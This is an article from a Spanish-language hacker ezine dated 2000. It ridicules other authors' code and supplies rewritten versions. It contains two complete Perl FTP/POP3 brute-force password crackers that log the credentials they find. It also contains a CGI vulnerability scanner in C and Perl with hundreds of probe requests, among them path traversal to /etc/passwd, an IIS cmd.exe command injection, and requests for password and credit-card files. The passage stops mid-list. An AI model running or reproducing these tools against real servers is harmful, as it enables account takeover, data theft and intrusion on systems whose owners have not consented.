hex nº11:(hex11-07.txt):04/04/2000 << Back To hex nº 11
< ---------------------------- [ Hex Ezine ] ------------------------------- > < - [ Meet The Code (o Humillando Pelotudos) ] ----------------------------- > < - [ by Fox ] ------------------------------------------------- (HEX11) --- > [ Coded By ^Kebracho^ ] heEEyYY dUDeZ hOy vAMoS a rEViSaR aLGuNoZ SoURceZ cODez dE gENte mUY h4x0r. pArA eMPeZar vAMoZ a TrABAJar SoBrE eL sOUrcE dE h3lLr41ZeR, StARrInG: 'ReX'. lUegO vAMoZ 4 vER uN CgI-Sc4nER dE dR_fDiSk^, sTArRiNG: 'cgi-sv6'. --[P0W3] actitud kebracho detected: K00L4T0R DUD3 aCa eMPieZa eL SoUrCe dE HelLRaiSeR [cOMenTariOS enTrE ## sOn MiOS] #!/usr/bin/perl use Socket; if(@ARGV != 4) { print("Uso: $0 <ftp/pop3> <host> <users file> <passwords file>\n"); exit(0); } ## Definicion de colores ## $Blanco="\033[1;37m"; ## $Default="\033[0;39m"; ## $Gris="\033[0;37m"; ## $Magenta="\033[0;36m"; ## $Blink_On="\033[0;5m"; ## $Blink_Off="\033[0;25m"; ## $Azul="\033[1;34m"; ## $Verde="\033[1;32m"; ## $Celeste="\033[1;36m"; ## ########################### $protocol=getprotobyname("tcp"); if(lc($ARGV[0]) eq "ftp") { $service=getservbyname("ftp", "tcp"); } elsif(lc($ARGV[0]) eq "pop3") { $service=getservbyname("pop3", "tcp"); } #$pelotudo++; #12 lineas que podes reemplazar por #$service=getservbyname($ARGV[0],"tcp") or die "uso: $0 etc etc etc\n"; else { print("Uso: $0 <ftp/pop3> <host> <users file> <passwords file>\n"); exit(-1); } $host=gethostbyname($ARGV[1]) || die("No se puede conectar a $ARGV[1]\n"); #No pablo no #a ver si entendes si te lo separo en silabas, GET-HOST-BY-NAME #si falla es que ese host no se puede resolver y vos pusiste que no se puede #conectar $ip=sockaddr_in($service, $host); open(USERS, $ARGV[2]) || die($Blanco, "No se puede abrir archivo de usuarios '", $Blink_On, $ARGV[1], $Blink_Off, $Blanco, "'", $Default, "\n"); open(PASSWD, $ARGV[3]) || die($Blanco, "No se puede abrir archivo de passwords '", $Blink_On, $ARGV[2], $Blink_Off, $Blanco, "'", $Default, "\n"); my @USER=<USERS>; my @PASS=<PASSWD>; close(USERS); close(PASSWD); $cracked=0; $VERSION="v2.0"; for($user_cant=0; $user_cant<=@USER; $user_cant++) {} for($pass_cant=0; $pass_cant<=@USER; $pass_cant++) {} $user_cant=$user_cant-1; $pass_cant=$pass_cant-1; #????????????????????????????????????????????????????????????????????????? #que? #te fuiste al /dev/null(?) #pensa 2 segundos.. si en el for le pones $pass<@USER no vas a necesitar #restarle 1 lo que nos lleva a lo otra linea, que es eso? anios 'usando' #(ojo que no dije programando) C y no conoces $var--; $var++; ? #siguiendo con la pelotudez, decimos $pelotudeZ++; por el coding: # my $tmp; # foreach $tmp (@USER){ $pass_cant++;} # foreach $tmp (@PASS){ $user_cant++;} $flag_a=0; $flag_b=0; print($Blanco, "\@\@\@\@[", $Celeste, " R", $Blanco, "e", $Celeste, "X ", $Blanco, $VERSION, " ]\@\@\@\@", $Default, "\n"); print($Blanco, "Programado por ", $Verde, "[Hellraiser]", $Blanco, " - <", $Celeste, "hell", $Blanco, "\@", $Celeste, "ezkracho.com.ar", $Blanco, ">", $Default, "\n"); print($Blanco, ".----------------------------------------------------", $Default, "\n"); print($Blanco, "| Maquina a crackear: ", $Gris, $ARGV[1], $Default, "\n"); print($Blanco, "| Servicio a crackear: ", $Gris, uc($ARGV[0]), $Default, "\n"); print($Blanco, "| Cantidad de usuarios a probar: ", $Gris, $user_cant, $Default, "\n"); print($Blanco, "| Cantidad de passwords a probar: ", $Gris, $pass_cant, $Default, "\n"); print($Blanco, "|____________________________________________________", $Default, "\n"); print($Blanco, "[Esta operacion demorara segun la cantidad de palabras a probar...]", $Default, "\n\n"); #no hay comentarios porque mas adelante le doy con un canio(?) for($all=0; $all<=@USER; $all++) { $flag_a=$all; for($pwd=0; $pwd<=@PASS; $pwd++) { $buffer=""; $flag_b=$pwd; if(@USER[$all] ne "") { $line_user=@USER[$all]; } if(@PASS[$pwd] ne "") { $line_pwd=@PASS[$pwd]; } chop($line_user); chop($line_pwd); sleep(1); #a quien se le ocurre poner un sleep en este lugar # y estando en un loop????? socket(sck, AF_INET, SOCK_STREAM, $protocol); connect(sck, $ip) || die($Blanco, "No se puede conectar a ", $Blink_On, $ARGV[1], $Blink_Off, $Blanco, "!", $Default, "\n"); ### FTP if(lc($ARGV[0]) eq "ftp") { sleep(2); #no mandaste ningun txt al server, para que sleepeas? send(sck, "USER $line_user\n", 0); sleep(2); send(sck, "PASS $line_pwd\n", 0); sleep(3); #para con el sleep!!!!, recv es bloquing recv(sck, $buffer, 700, 0); #bueno... #eh aqui el $pelotudeZ * 10; #think about it dude, los 2 if's mandan la misma linea, no? #lo unico distinto es el buffer #entonces... #hacias una sola estructura con 2 ifs chiquitos que evaluaran el #buffer y te ahorrabas 20 lineas [en un src de 150] if($buffer !~ "530 Login incorrect.") { if($buffer !~ "503 Login with USER first.") { $cracked=$cracked+1; if($cracked<10) { print ($Blanco, "[Crackeados (", $Gris, $Blink_On, "0", $cracked, $Blink_Off, $Blanco, ")]", $Verde, "*", $Blanco, "> ", $Blanco, "User: ", $Magenta, $line_user, $Blanco, " /", $Blanco, " Password: ", $Magenta, $line_pwd, $Default, "\a\n"); } else { print ($Blanco, "[Crackeados (", $Gris, $Blink_On, $cracked, $Blink_Off, $Blanco, ")]", $Verde, "*", $Blanco, "> ", $Blanco, "User: ", $Magenta, $line_user, $Blanco, " /", $Blanco, " Password: ", $Magenta, $line_pwd, $Default, "\a\n"); } #if(soy un pelotudo){ print "jaja im a looser\n"} #else { print "jaja im a looser\n"} #volve al circo } send(sck, "QUIT\n", 0); close(sck); sleep(1); } } #### POP3 if(lc($ARGV[0]) eq "pop3") { send(sck, "USER $line_user\n", 0); sleep(1); send(sck, "PASS $line_pwd\n", 0); sleep(6); recv(sck, $buffer, 700, 0); if($buffer !~ "-ERR") { $cracked=$cracked+1; if($cracked<10) { print ($Blanco, "[Crackeados (", $Gris, $Blink_On, "0", $cracked, $Blink_Off, $Blanco, ")]", $Verde, "*", $Blanco, "> ", $Blanco, "User: ", $Magenta, $line_user, $Blanco, " /", $Blanco, " Password: ", $Magenta, $line_pwd, $Default, "\a\n"); } else { print ($Blanco, "[Crackeados (", $Gris, $Blink_On, $cracked, $Blink_Off, $Blanco, ")]", $Verde, "*", $Blanco, "> ", $Blanco, "User: ", $Magenta, $line_user, $Blanco, " /", $Blanco, " Password: ", $Magenta, $line_pwd, $Default, "\a\n"); } } send(sck, "QUIT\n", 0); close(sck); }}} #no se si se dieron cuenta... #ovbiamente el code prueba el user con cada passwd en el archivo que #le diste pero la cosa es que cuando encuentra un passwd que ande #no le importa y sigue probando con el mismo user hasta que el archivo #de passwd termine, perl -e 'print "Pablo comilon"x1000' # #si le agregan la linea print "probando $line_user $line_pass\n"; #abajo de if(lc($ARGV[0] eq "ftp"){ #al ejecutarlo ven esto: #probando netdork aguantedatafull #[Crackeados (01)]*> User: netdork / Password: aguantedatafull #probando netdork passwdgil #probando netdork lalala #probando netdork otropasswd # #Mas alla de la elegancia de su source, no podes publicar algo #que haga eso.... print("\n", $Blanco, "<", $Blink_On, "Crackeo finalizado!", $Blink_Off, $Blanco, ">", $Default); print("\n", $Blanco, "<Usuarios Probados: ", $Verde, $user_cant, $Blanco, " Passwords Probados: ", $Verde, $pass_cant, $Blanco, " Usuarios Crackeados: ", $Verde, $cracked, $Blanco, ">", $Default, "\n"); close(sck); exit(0); --------------------==========================---------------------------- aCa eMPieZa eL sOUrCe deL ReX quE yO eSCriBi: #!/usr/bin/perl use Socket; if(@ARGV != 4) { print("Uso: $0 <ftp/pop3> <host> <users file> <passwords file>\n"); exit(0); } ## Definicion de colores ## $Blanco="\033[1;37m"; ## $Default="\033[0;39m"; ## $Gris="\033[0;37m"; ## $Blink_On="\033[0;5m"; ## $Blink_Off="\033[0;25m"; ## $Verde="\033[1;32m"; ## ########################### $protocol=getprotobyname("tcp"); $service=getservbyname($ARGV[0], "tcp"); $host=gethostbyname($ARGV[1]) || die("No se puede conectar a $ARGV[1]\n"); $ip=sockaddr_in($service, $host); open(USERS, $ARGV[2]) || die($Blanco, "No se puede abrir archivo de usuarios '", $Blink_On, $ARGV[1], $Blink_Off, $Blanco, "'", $Default, "\n"); open(PASSWD, $ARGV[3]) || die($Blanco, "No se puede abrir archivo de passwords '", $Blink_On, $ARGV[2], $Blink_Off, $Blanco, "'", $Default, "\n"); my @USER=<USERS>; my @PASS=<PASSWD>; close(USERS); close(PASSWD); $cracked=0; my $tmp; foreach $tmp (@USER) {$user_cant++;} foreach $tmp (@PASS) {$pass_cant++;} print($Blanco, ".----------------------------------------------------", $Default, "\n"); print($Blanco, "| Maquina a crackear: ", $Gris, $ARGV[1], $Default, "\n"); print($Blanco, "| Servicio a crackear: ", $Gris, uc($ARGV[0]), $Default, "\n"); print($Blanco, "| Cantidad de usuarios a probar: ", $Gris, $user_cant, $Default, "\n"); print($Blanco, "| Cantidad de passwords a probar: ", $Gris, $pass_cant, $Default, "\n"); print($Blanco, "|____________________________________________________", $Default, "\n"); $ok=1; $h=0; open LOG, ">>h4x0reosession"; foreach $line_user (@USER){ foreach $line_pwd (@PASS){ sleep(1); socket(sck, AF_INET, SOCK_STREAM, $protocol); connect(sck, $ip) || die($Blanco, "No se puede conectar a ", $Blink_On, $ARGV[1], $Blink_Off, $Blanco, "!", $Default, "\n"); send(sck, "USER $line_user\n", 0); sleep(1); send(sck, "PASS $line_pwd\n", 0); sleep(1); recv(sck, $buffer, 700, 0); if(lc($ARGV[0] eq "pop3")){ if($buffer=~ /ERR/){ $cracked=0;} else { if($buffer=~ /OK opened/){ $cracked=$ok; $h++;} }} if(lc($ARGV[0] eq "ftp")){ if($buffer=~ /503 Login incorrect/){ $cracked=0;} else { if($buffer=~ /logged in/){ $cracked=$ok;$h++ } }} if($cracked eq $ok) { print " [Crackeados ($h)] User: $line_user \bPassword: $line_pwd \n"; print LOG "$line_user -- $line_pwd at $ARGV[1]\n"; last; } send(sck, "QUIT\n\r", 0); close(sck); $cracked=0; } } print("\n", $Blanco, "<", $Blink_On, "Crackeo finalizado!", $Blink_Off, $Blanco, ">", $Default); print("\n", $Blanco, "<Usuarios Probados: ", $Verde, $user_cant, $Blanco, " Passwords Probados: ", $Verde, $pass_cant, $Blanco, " Usuarios Crackeados: ", $Verde, $h, $Blanco, ">", $Default, "\n"); close LOG; close(sck); exit(0); #en el archivo de passwords deja (en cualquier lugar) una linea en blanco #porque el pop3 no la cuenta aunque el user no tenga passwd, hay que ponerle #pass [enter] #[osea con un espacio] #1- es mas corto [aunque le puse que guarde un log] #2- mas rapido #3- CUANDO CRACKEA 1 USER PASA AL OTRO! Conclusion: PaBlO dEDiCaTE a PrOGraMAr eN C.. eH .. mEJoR deDICaTe a LeEr sOBrE C. ########################asciitrashbyhellraiser############################ ((((((((((((((((((((((((((((((((((%)))))))))))))))))))))))))))))))))))))))) aQuI emPIeZa eL SoURce CoDE dE dR_fDIsk^ /******************************************************************* c0ded by dr_fdisk^ ********************************************************************/ //porque tienen que poner cada 3 lineas que vos lo codeaste? // ego--; loco #include "../include/els-lib.h" int sock; struct in_addr addr; struct hostent *victima; struct sockaddr_in sin; void main(int argc, char *argv[]) { buff[1]= "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; buff[2]= "GET /cgi-bin/unlg1.2 HTTP/1.0\n\n"; buff[3]= "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n"; buff[4]= "GET /cgi-bin/gH.cgi HTTP/1.0\n\n"; buff[5]= "GET /cgi-bin/phf HTTP/1.0\n\n"; buff[6]= "GET /cgi-bin/phf.cgi HTTP/1.0\n\n"; buff[7]= "GET /cgi-bin/Count.cgi HTTP/1.0\n\n"; buff[8]= "GET /cgi-bin/test-cgi HTTP/1.0\n\n"; [ InSErTe AquI 3oo lINeaS IguALEs BuT dIFerEnt cGI ] buff[429]= "GET /products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/ HTTP/1.0\n\n"; buff[430]= "GET /search.dll?search?query=%00&logic=AND HTTP/1.0\n\n"; buff[431]= "GET /search.dll?search?query=/&logic=AND HTTP/1.0\n\n"; buff[432]= "GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd HTTP/1.0\n\n"; buff[433]= "GET /ddrint/bin/ddicgi.exe? HTTP/1.0\n\n"; buff[434]= "GET /cp/rac/nsManager.cgi?Language=english HTTP/1.0\n\n"; cnm[1]= "unlg1.1 "; cnm[2]= "unlg1.2 "; cnm[3]= "rwwwshell.pl "; cnm[4]= "gH.cgi "; cnm[5]= "phf "; cnm[6]= "phf.cgi "; cnm[7]= "Count.cgi "; cnm[8]= "test-cgi "; cnm[9]= "nph-test-cgi "; [ iNSeRte aqUi eL mISmo ComENtAriO ] cnm[429]= "/products/phpPhotoAlbum/explorer.php (PhotoAlbum vuln) "; cnm[430]= "/search.dll?search?query=%00&logic=AND (sambar vuln)"; cnm[431]= "/search.dll?search?query=/&logic=AND (sambar vuln)"; cnm[432]= "/cgi-bin/YaBB.pl "; cnm[433]= "/ddrint/bin/ddicgi.exe "; cnm[434]= "/cp/rac/nsManager.cgi?Language=english "; //bueno... // no era mas facil poner char *buf[]="/cgi/lala","/cgi/dhdh", etc etc ?? //te ahorrabas de escribir 400 veces cnm[number]; if (argc<2){ system("clear"); printf("\n\n\n"); printf("%s%sElite CGI SCANNER %s by dr_fdisk^\n",BRILLOSO,CELESTE,release,VERDE); printf("%s-------------------------------------------------------\n\n",ROJO); printf("%suso: %s./%s %svictima %s%s(FULL) \n",VERDE,ROJO,argv[0],VERDE,NORMAL,BRILLOSO); printf("%suso: %s./%s %svictima -v %s%s(gets only HTTP VERSION)\n",VERDE,ROJO,argv[0],VERDE,NORMAL,BRILLOSO); exit(0); } //colores, signo de elegancia y funny code else if ((victima=gethostbyname(argv[1])) == NULL){ printf("%s%sHost invalido%s\n",BRILLOSO,ROJO,NORMAL); exit(0);} start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(victima->h_addr, (char *)&sin.sin_addr, victima->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { printf("Servicio no disponible\n"); exit(0); } system("clear"); //agh#$%# system! printf("\n\n\n%s%sElite CGI Scanner c0ded by %sdr_fdisk^\n",NORMAL,BRILLOSO,ROJO); printf("%s%sVictima: %s%s\n",NORMAL,ROJO,BRILLOSO,argv[1]); printf("%s%sTotal CGIs: %s434\n\n",NORMAL,ROJO,BRILLOSO); printf("%s%s=========================================================%s\n",NORMAL,BRILLOSO,NORMAL); if (argc>2) { if(strstr("-v",argv[2])) { send(sock,version,17,0); recv(sock, targetver, sizeof(targetver),0); printf("%s %s",BRILLOSO,targetver); close(sock);exit(0); }}else send(sock,version,17,0); recv(sock, targetver, sizeof(targetver),0); //posibilidad: //porque no pusste el if abajo del recv y hacias el checkeo de -v ahi? //te ahorrabas el otro send del 'version' //si el target es lento te ahorras mucho tiempo printf("%s %s",BRILLOSO,targetver); close(sock); printf("%s%s=========================================================%s\n\n",NORMAL,BRILLOSO,NORMAL); system("sleep 3"); //que? //que???? //como???????? //que hiciste que?????? //system("sleep 3")????????? //que?????????????????????????????????? // TE FUISTE AL CARAJO while(count++ < 434) //uh, cada vez que agregas un cgi tenes que cambiar el numero este? //que payaso.. { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(victima->h_addr, (char *)&sin.sin_addr, victima->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) {exit(0);} printf("%s%s %s------>%s ",BRILLOSO,cnm[count],CELESTE,NORMAL); for(numin=0;numin < 20;numin++) {lists[numin] = '\0';} //memset(lists,'\0',sizeof(lists)); //mi source es mas elite que el tuyooooooooooooo! send(sock, buff[count],strlen(buff[count]),0); recv(sock, lists, sizeof(lists),0); scanstr = strstr(lists,encontrado); //dato: encontrado=200 //ahora... que sistema de busqueda glorioso // si el host es 200.com.ar en el recv te va a aparecer 200 aunque no este //los misterios de la vida(?) if( scanstr != NULL) {printf("%s%sENCONTRADO!%s\n",BRILLOSO,ROJO,NORMAL);++fin;} else printf("%s%sno esta%s\n",BRILLOSO,VERDE,NORMAL); }close(sock);} //encima esta no es la primera version que hace de este scaner.... --------------------------======================-------------------------- AqUI cOMi3nZa nUEstRo sOUrCe cODe: use Socket; if(@ARGV ne 1) {die "uso: $0 host\n";} $host=$ARGV[0]; $pepe=inet_aton($host); $port=80; $b="\033[1;37m"; $a="\033[1;34m"; $v="\033[1;32m"; $x="\033[0;37m"; my @cgis=( "/cgi-bin/unlg1.1 HTTP/1.0","/cgi-bin/unlg1.2 HTTP/1.0", "/cgi-bin/rwwwshell.pl HTTP/1.0","/cgi-bin/gH.cgi HTTP/1.0", "/cgi-bin/phf HTTP/1.0","/cgi-bin/phf.cgi HTTP/1.0", "/cgi-bin/Count.cgi HTTP/1.0\n\n","/cgi-bin/test-cgi HTTP/1.0\n\n", "/cgi-bin/nph-test-cgi HTTP/1.0","/cgi-bin/nph-publish HTTP/1.0\n\n", "/cgi-bin/php.cgi HTTP/1.0\n\n","/cgi-bin/php HTTP/1.0\n\n", "/cgi-bin/handler HTTP/1.0\n\n","/cgi-bin/webgais HTTP/1.0\n\n", "/cgi-bin/websendmail HTTP/1.0\n\n","/cgi-bin/webdist.cgi HTTP/1.0\n\n", "/cgi-bin/faxsurvey HTTP/1.0\n\n","/cgi-bin/htmlscript HTTP/1.0\n\n", "/cgi-bin/pfdisplay HTTP/1.0\n\n","/cgi-bin/perl.exe HTTP/1.0\n\n", "/cgi-bin/wwwboard.cgi HTTP/1.0\n\n","/cgi-bin/wwwboard.pl HTTP/1.0\n\n", "/cgi-bin/www-sql HTTP/1.0\n\n","/cgi-bin/view-source HTTP/1.0\n\n", "/cgi-bin/campas HTTP/1.0\n\n","/cgi-bin/aglimpse HTTP/1.0\n\n", "/cgi-bin/glimpse HTTP/1.0\n\n","/cgi-bin/man.sh HTTP/1.0\n\n", "/cgi-bin/AT-admin.cgi HTTP/1.0\n\n","/cgi-bin/filemail.cgi HTTP/1.0\n\n", "/cgi-bin/maillist.cgi HTTP/1.0\n\n","/cgi-bin/jj HTTP/1.0\n\n", "/cgi-bin/info2www HTTP/1.0\n\n","/cgi-bin/files.pl HTTP/1.0\n\n", "/cgi-bin/finger HTTP/1.0\n\n","/cgi-bin/bnbform.cgi HTTP/1.0\n\n", "/cgi-bin/survey.cgi HTTP/1.0\n\n", "/cgi-bin/AnyForm2 HTTP/1.0\n\n","/cgi-bin/textcounter.pl HTTP/1.0\n\n", "/cgi-bin/classifieds.cgi HTTP/1.0\n\n","/cgi-bin/environ.cgi HTTP/1.0\n\n", "/cgi-bin/wrap HTTP/1.0\n\n","/cgi-bin/cgiwrap HTTP/1.0\n\n", "/cgi-bin/guestbook.cgi HTTP/1.0\n\n","/cgi-bin/guestbook.pl HTTP/1.0\n\n", "/cgi-bin/edit.pl HTTP/1.0\n\n","/cgi-bin/perlshop.cgi HTTP/1.0\n\n", "/cgi-bin/webbbs.cgi HTTP/1.0\n\n","/cgi-bin/whois_raw.cgi HTTP/1.0\n\n", "/cgi-bin/AnyBoard.cgi HTTP/1.0\n\n","/cgi-bin/dumpenv.pl HTTP/1.0\n\n", "/cgi-bin/login.cgi HTTP/1.0\n\n","/test/test.cgi HTTP/1.0\n\n", "/_vti_inf.html HTTP/1.0\n\n","/_vti_bin/ HTTP/1.0\n\n", "/_vti_pvt/users.pwd HTTP/1.0\n\n","/_vti_pvt/service.pwd HTTP/1.0\n\n", "/_vti_pvt/authors.pwd HTTP/1.0\n\n","/_vti_pvt/admin.pwd HTTP/1.0\n\n", "/_vti_pwd/administrators.pwd HTTP/1.0\n\n","/_vti_bin/shtml.dll HTTP/1.0\n\n", "/_vti_bin/shtml.exe HTTP/1.0\n\n", "/cgi-dos/args.bat HTTP/1.0\n\n","/cgi-win/uploader.exe HTTP/1.0\n\n", "/cgi-bin/rguest.exe HTTP/1.0\n\n","/cgi-bin/wguest.exe HTTP/1.0\n\n", "/scripts/issadmin/bdir.htr HTTP/1.0\n\n", "/scripts/CGImail.exe HTTP/1.0\n\n","/scripts/tools/newdsn.exe HTTP/1.0\n\n", "/scripts/tools/getdrvrs.exe HTTP/1.0\n\n","/getdrvrs.exe HTTP/1.0\n\n", "/scripts/fpcount.exe HTTP/1.0\n\n","/scripts/counter.exe HTTP/1.0\n\n", "/scripts/visadmin.exe HTTP/1.0\n\n","/scripts/perl.exe HTTP/1.0\n\n", "/scripts/../../cmd.exe?%2FC+echo+\"hacked!\">c:\\hello.bat HTTP/1.0\n\n", "/users/scripts/submit.cgi HTTP/1.0\n\n", "/cfdocs/expelval/openfile.cfm HTTP/1.0\n\n","/cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n", "/cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n", "/cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","/cfdocs/examples/parks/detail.cfm HTTP/1.0\n\n", "/cfdocs/snippets/fileexists.cfm HTTP/1.0\n\n","/cfdocs/examples/mainframeset.cfm HTTP/1.0\n\n", "/iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n", "/iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n", "/msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n","/search97.vts HTTP/1.0\n\n", "/carbo.dll HTTP/1.0\n\n","/domcfg.nsf/?open HTTP/1.0\n\n", "/?PageServices HTTP/1.0\n\n","/....../autoexec.bat HTTP/1.0\n\n", "/cfdocs/zero.cfm HTTP/1.0\n\n","/cfdocs/root.cfm HTTP/1.0\n\n", "/cfdocs/expressions.cfm HTTP/1.0\n\n","/cfdocs/expeval/eval.cfm HTTP/1.0\n\n", "/cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\n\n", "/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini HTTP/1.0\n\n", "/cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.0\n\n", "/cfdocs/exampleapp/email/application.cfm HTTP/1.0\n\n", "/cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\n\n", "/cfdocs/examples/parks/detail.cfm HTTP/1.0\n\n", "/cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\n\n", "/cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\n\n","/cfdocs/snippets/viewexample.cfm HTTP/1.0\n\n", "/cfdocs/snippets/gettempdirectory.cfm HTTP/1.0\n\n", "/cfdocs/snippets/fileexists.cfm HTTP/1.0\n\n","/cfdocs/snippets/evaluate.cfm HTTP/1.0\n\n", "/cfusion/cfapps/forums/forums_.mdb HTTP/1.0\n\n", "/cfusion/cfapps/security/realm_.mdb HTTP/1.0\n\n", "/cfusion/cfapps/forums/data/forums.mdb HTTP/1.0\n\n", "/cfusion/cfapps/security/data/realm.mdb HTTP/1.0\n\n", "/cfusion/database/cfexamples.mdb HTTP/1.0\n\n", "/cfusion/database/cfsnippets.mdb HTTP/1.0\n\n","/cfusion/database/smpolicy.mdb HTTP/1.0\n\n", "/cfusion/database/cypress.mdb HTTP/1.0\n\n","/DataBase/ HTTP/1.0\n\n","/database.nsf/ HTTP/1.0\n\n", "/cgi-bin/cgi-lib.pl HTTP/1.0\n\n","/cgi-bin/minimal.exe HTTP/1.0\n\n", "/cgi-bin/redir.exe HTTP/1.0\n\n","/cgi-bin/stats.prg HTTP/1.0\n\n", "/cgi-bin/statsconfig HTTP/1.0\n\n", "/cgi-bin/visitor.exe HTTP/1.0\n\n","/cgi-bin/htmldocs HTTP/1.0\n\n", "/cgi-bin/logs HTTP/1.0\n\n","/_vti_bin HTTP/1.0\n\n", "/_vti_bin/_vti_adm HTTP/1.0\n\n","/_vti_bin/_vti_aut HTTP/1.0\n\n", "/srchadm HTTP/1.0\n\n","/iisadmin HTTP/1.0\n\n", "/html/?PageServices HTTP/1.0\n\n","/scripts/run.exe HTTP/1.0\n\n", "/scripts/iisadmin/samples/ctgestb.htx HTTP/1.0\n\n", "/scripts/iisadmin/samples/ctgestb.idc HTTP/1.0\n\n", "/scripts/iisadmin/samples/details.htx HTTP/1.0\n\n", "/scripts/iisadmin/samples/details.idc HTTP/1.0\n\n", "/scripts/iisadmin/samples/query.htx HTTP/1.0\n\n", "/scripts/iisadmin/samples/query.idc HTTP/1.0\n\n", "/scripts/iisadmin/samples/register.htx HTTP/1.0\n\n", "/scripts/iisadmin/samples/register.idc HTTP/1.0\n\n", "/scripts/iisadmin/samples/sample.htx HTTP/1.0\n\n", "/scripts/iisadmin/samples/sample.idc HTTP/1.0\n\n", "/scripts/iisadmin/samples/sample2.htx HTTP/1.0\n\n", "/scripts/iisadmin/samples/viewbook.htx HTTP/1.0\n\n", "/scripts/iisadmin/samples/viewbook.idc HTTP/1.0\n\n", "/scripts/iisadmin/tools/ct.htx HTTP/1.0\n\n", "/scripts/iisadmin/tools/ctss.idc HTTP/1.0\n\n","/scripts/iisadmin/tools/dsnform.exe HTTP/1.0\n\n", "/scripts/iisadmin/tools/getdrvrs.exe HTTP/1.0\n\n","/scripts/iisadmin/tools/mkilog.exe HTTP/1.0\n\n", "/scripts/iisadmin/tools/newdsn.exe HTTP/1.0\n\n","/IISADMPWD/achg.htr HTTP/1.0\n\n", "/IISADMPWD/aexp.htr HTTP/1.0\n\n","/IISADMPWD/aexp2.htr HTTP/1.0\n\n", "/IISADMPWD/aexp2b.htr HTTP/1.0\n\n","/IISADMPWD/aexp3.htr HTTP/1.0\n\n", "/IISADMPWD/aexp4.htr HTTP/1.0\n\n","/IISADMPWD/aexp4b.htr HTTP/1.0\n\n", "/IISADMPWD/anot.htr HTTP/1.0\n\n","/IISADMPWD/anot3.htr HTTP/1.0\n\n", "/_vti_pvt/writeto.cnf HTTP/1.0\n\n","/_vti_pvt/svcacl.cnf HTTP/1.0\n\n", "/_vti_pvt/services.cnf HTTP/1.0\n\n","/_vti_pvt/service.stp HTTP/1.0\n\n", "/_vti_pvt/service.cnf HTTP/1.0\n\n"," /_vti_pvt/access.cnf HTTP/1.0\n\n", " /_private/registrations.txt HTTP/1.0\n\n","/_private/registrations.htm HTTP/1.0\n\n", "/_private/register.txt HTTP/1.0\n\n","/_private/register.htm HTTP/1.0\n\n", "/_private/orders.txt HTTP/1.0\n\n","/_private/orders.htm HTTP/1.0\n\n", "/_private/form_results.htm HTTP/1.0\n\n","/_private/form_results.txt HTTP/1.0\n\n", "/_vti_bin/_vti_adm/admin.dll HTTP/1.0\n\n","/scripts/perl? HTTP/1.0\n\n", "/cgi-bin/passwd HTTP/1.0\n\n","/cgi-bin/passwd.txt HTTP/1.0\n\n", "/cgi-bin/password HTTP/1.0\n\n","/cgi-bin/password.txt HTTP/1.0\n\n", "/cgi-bin/ax.cgi HTTP/1.0\n\n","/cgi-bin/ax-admin.cgi HTTP/1.0\n\n", "/scripts/convert.bas HTTP/1.0\n\n","/session/admnlogin HTTP/1.0\n\n", "/cgi-bin/cachemgr.cgi HTTP/1.0\n\n","/cgi-bin/query HTTP/1.0\n\n", "/cgi-bin/rpm_query HTTP/1.0\n\n","/cgi-bin/dbmlparser.exe HTTP/1.0\n\n", "/cgi-bin/flexform.cgi HTTP/1.0\n\n","/cgi-bin/responder.cgi HTTP/1.0\n\n", "/cgi-bin/imagemap.exe HTTP/1.0\n\n","/search HTTP/1.0\n\n", "/cgi-bin/ HTTP/1.0\n\n","/scripts/ HTTP/1.0\n\n", "/cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\n\n", "/cfdocs/snippets/fileexist.cfm HTTP/1.0\n\n", "/cfappman/index.cfm HTTP/1.0\n\n","/scripts/cpshost.dll HTTP/1.0\n\n", "/samples/search/queryhit.htm HTTP/1.0\n\n","/msadc/msadcs.dll HTTP/1.0\n\n", "/scripts/proxy/w3proxy.dll HTTP/1.0\n\n","/cgi-bin/MachineInfo HTTP/1.0\n\n", "/cgi-bin/lwgate HTTP/1.0\n\n","/cgi-bin/lwgate.cgi HTTP/1.0\n\n", "/cgi-bin/LWGate HTTP/1.0\n\n","/cgi-bin/LWGate.cgi HTTP/1.0\n\n", "/cgi-bin/nlog-smb.cgi HTTP/1.0\n\n","/cgi-bin/icat HTTP/1.0\n\n", "/cgi-bin/axs.cgi HTTP/1.0\n\n","/publisher/ HTTP/1.0\n\n", "/cgi-bin/mlog.phtml HTTP/1.0\n\n","/ssi/envout.bat HTTP/1.0\n\n", "/cgi-bin/archie HTTP/1.0\n\n","/cgi-bin/bb-hist.sh HTTP/1.0\n\n", "/cgi-bin/nph-error.pl HTTP/1.0\n\n","/cgi-bin/post_query HTTP/1.0\n\n", "/cgi-bin/ppdscgi.exe HTTP/1.0\n\n","/cgi-bin/webmap.cgi HTTP/1.0\n\n", "/scripts/tools/getdrvs.exe HTTP/1.0\n\n","/cgi-bin/upload.pl HTTP/1.0\n\n", "/scripts/pu3.pl HTTP/1.0\n\n","/WebShop/logs/cc.txt HTTP/1.0\n\n", "/WebShop/templates/cc.txt HTTP/1.0\n\n","/quikstore.cfg HTTP/1.0\n\n", "/PDG_Cart/shopper.conf HTTP/1.0\n\n","/PDG_Cart/order.log HTTP/1.0\n\n", "/pw/storemgr.pw HTTP/1.0\n\n","/iissamples/iissamples/query.asp HTTP/1.0\n\n", 